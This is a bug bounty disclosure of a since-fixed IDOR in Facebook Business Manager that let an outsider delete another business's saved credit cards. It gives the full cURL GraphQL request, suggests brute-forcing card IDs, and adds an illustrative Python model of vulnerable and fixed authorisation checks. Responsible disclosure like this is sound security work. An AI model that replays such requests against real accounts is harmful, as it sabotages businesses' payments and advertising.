[IDOR] Delete saved credit cards from any Business Manager Account — Facebook Bug Bounty

Rohit kumar
2 min read · Jun 5, 2020

Business Manager has an option to add and manage credit cards. However, this functionality is limited to authorized “Admins” of that particular Business.

In this report, I will demonstrate how it’s possible to delete saved credit cards without having an admin or any other role in the victim’s Business.

Impact
===
Any attacker could disrupt the victim’s business operations by removing all saved credit cards, which would result in the termination of all Ads run by the victim’s Business on Facebook.

Setup
===
Users: USER A, USER B; USER A is Admin of “Business A”, USER B is Admin of “Business B”

Victim — “USER A & BUSINESS A”
Attacker — “USER B & Business B”

Description:

Add a credit card from the “USER A” account in “Business A” using this link: https://business.facebook.com/settings/payment-methods/?business_id=BUSINESS_ID

Steps
==
1. Now, switch to the USER B account (USER B isn’t associated with BUSINESS A).
2. For performing this attack, you need a Business ID & a Credit Card ID.
3. Send a POST request to https://business.facebook.com/api/graphql/ with these variables `{"biz_id":"BUSINESS_ID_HERE","fs_id":CREDIT_CARD_ID}` on RemoveFundingSourceButtonV2CCMutation.

For reference, here is the full cURL request (cookie and tokens replaced with placeholders):

```bash
curl 'https://business.facebook.com/api/graphql/' \
  -H 'authority: business.facebook.com' \
  -H 'origin: https://business.facebook.com/' \
  -H 'sec-fetch-dest: empty' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36' \
  -H 'dnt: 1' \
  -H 'content-type: application/x-www-form-urlencoded' \
  -H 'accept: */*' \
  -H 'sec-fetch-site: same-origin' \
  -H 'sec-fetch-mode: cors' \
  -H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'cookie: BROWSER_COOKIE_HERE' \
  --data 'av=100005595064283&__user=100005595064283&__a=1&__dyn=DYN_TOKEN_HERE&__csr=&__req=p&__beoa=0&__pc=PHASED%3Abrands_pkg&dpr=1&__rev=1001776419&__s=veodst%3Auavjgo%3Avwvt5b&__hsi=6799248542192993611-0&__comet_req=0&fb_dtsg=FB_DTSG_TOKEN&jazoest=22122&__spin_r=1001776419&__spin_b=trunk&__spin_t=1583073414&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=RemoveFundingSourceButtonV2CCMutation&variables=%7B%22biz_id%22%3A%22BUSINESS_ID_HERE%22%2C%22fs_id%22%3ACREDIT_CARD_ID%7D&doc_id=2073258542777671' \
  --compressed
```

4. Run this request, and the credit card is removed from a Business in which USER B has no role at all!

How can we get the Business ID & Credit Card ID?
===
There are multiple ways to get a credit card ID:

1. If you were an admin of Business A in the past and someone later removed you from Business A, you can still get the Business ID from the Business Manager pages in your browsing history. Generally, the credit card ID appears in this URL: https://business.facebook.com/settings/payment-methods/CREDIT_CARD_ID?business_id=BUSINESS_ID

2. Another way is to brute-force the credit card ID.
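As an added illustration (not code from this report or from Facebook), a minimal Python model of the mutation handler: the vulnerable version trusts the client-supplied biz_id and fs_id exactly as steps 1 to 4 describe, while the fixed version checks the actor's admin role in the business and that the funding source belongs to that business, which also defeats the remembered or brute-forced IDs discussed above. The user/business/card names, the in-memory state and the Forbidden error are assumptions.

```python
from dataclasses import dataclass, field

@dataclass
class Business:
    biz_id: str
    admins: set = field(default_factory=set)
    funding_sources: set = field(default_factory=set)  # saved card ids

class Forbidden(Exception):
    """Hypothetical authorisation error: the actor may not act on this object."""

def make_state() -> dict:
    """Constructed sample data mirroring the report's setup: USER_A administers
    BUSINESS_A, USER_B administers BUSINESS_B. All ids are placeholders."""
    return {
        "BUSINESS_A": Business("BUSINESS_A", {"USER_A"}, {"CC_1001"}),
        "BUSINESS_B": Business("BUSINESS_B", {"USER_B"}, {"CC_2002"}),
    }

def remove_funding_source_vulnerable(state, actor, biz_id, fs_id) -> bool:
    """Behaviour the report describes: the handler trusts the client-supplied
    biz_id/fs_id and never checks the actor's role in that business."""
    biz = state[biz_id]
    if fs_id not in biz.funding_sources:
        return False
    biz.funding_sources.remove(fs_id)
    return True

def remove_funding_source_fixed(state, actor, biz_id, fs_id) -> bool:
    """Hardened handler: authorise the actor against biz_id first, then bind
    fs_id to that business, so a guessed or remembered id alone is useless."""
    biz = state.get(biz_id)
    if biz is None or actor not in biz.admins:
        raise Forbidden(f"{actor} is not an admin of {biz_id}")
    if fs_id not in biz.funding_sources:
        # Deny rather than 'not found', so cross-business probing learns nothing.
        raise Forbidden(f"{fs_id} is not a funding source of {biz_id}")
    biz.funding_sources.remove(fs_id)
    return True

def outcome(handler, state, actor, biz_id, fs_id) -> str:
    """Run a handler and map its result to the label a server would log."""
    try:
        return "removed" if handler(state, actor, biz_id, fs_id) else "not_found"
    except Forbidden:
        return "forbidden"

if __name__ == "__main__":
    for handler in (remove_funding_source_vulnerable, remove_funding_source_fixed):
        print(handler.__name__, outcome(handler, make_state(), "USER_B", "BUSINESS_A", "CC_1001"))
```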

Timeline:

Reported : 2 March 2020

Clarifications & Discussion: 4th March 2020 to 26th March 2020

Pre-Triaged & Triaged: 8 April 2020

Fixed: 14 April 2020

Bounty Issued: 16 April 2020
